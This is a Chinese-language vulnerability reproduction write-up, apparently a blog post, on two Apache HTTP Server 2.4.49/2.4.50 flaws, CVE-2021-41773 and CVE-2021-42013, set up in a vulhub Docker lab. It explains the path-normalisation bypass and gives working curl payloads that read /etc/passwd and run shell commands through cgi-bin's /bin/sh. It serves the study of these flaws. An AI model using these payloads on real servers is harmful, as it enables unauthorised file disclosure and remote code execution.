Apache HTTP Server2.4.50中的路径遍历和命令执行漏洞(CVE-2021-41773 & CVE-2021-42013)

CVE-2021-41773

一、漏洞介绍

        HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码，然后判断是否存在…/的路径穿越符。

        当检测到路径中存在%字符时，如果紧跟的2个字符是十六进制字符，就会进行url解码，将其转换成标准字符，如%2e->.，转换完成后会判断是否存在…/。
        如果路径中存在%2e./形式，就会检测到，但是出现.%2e/这种形式时，就不会检测到，原因是在遍历到第一个.字符时，此时检测到后面的两个字符是%2而不是./，就不会把它当作路径穿越符处理，因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测

二、影响版本

Apache HTTP2.4.49

三、漏洞复现

cd vulhub/httpd/CVE-2021-41773

docker-compose up -d开启环境

docker ps得知开放的是8080端口

漏洞利用poc

curl -v --path-as-is http://192.168.236.128:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

CVE-2021-42013

一、漏洞介绍

该漏洞是由于在 Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善，攻击者可利用该漏洞绕过修复补丁，并利用目录穿越攻击访问服务器中一些文件，进而造成敏感信息泄露。若httpd中开启CGI功能，攻击者可以构造恶意请求，造成远程代码执行

二、影响版本

• Apache HTTP Server 2.4.49
• Apache HTTP Server 2.4.50

三、漏洞复现

cd vulhub/httpd/CVE-2021-42013

docker-compose up -d开启环境

docker ps得知开放的是8080端口

 访问开启的环境，看到了 It works 证明环境开启成功

漏洞利用poc：

curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

 存在目录遍历漏洞

 在服务器上启用 mods cgi 或 cgid 后 此目录遍历漏洞将允许任意命令执行：

curl -v --data "echo;id" 'http://ip:port/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
或者
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; whoami' "http://ip:port//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"